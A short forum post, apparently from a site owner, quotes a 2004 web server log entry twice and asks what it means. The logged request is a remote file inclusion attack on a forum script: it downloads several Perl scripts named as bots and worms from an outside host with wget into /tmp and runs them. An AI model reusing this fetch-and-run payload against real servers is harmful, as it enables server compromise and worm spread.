Tweet
I just noticed this while I was checking my logs:
209.167.241.131 - - [27/Dec/2004:08:28:49 +0200] "GET /forums/showthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;
wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;
wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;
perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 22971 "-" "LWP::Simple/5.65"
What's that trying to do?
209.167.241.131 - - [27/Dec/2004:08:28:49 +0200] "GET /forums/showthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;
wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;
wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;
perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 22971 "-" "LWP::Simple/5.65"
What's that trying to do?
Comment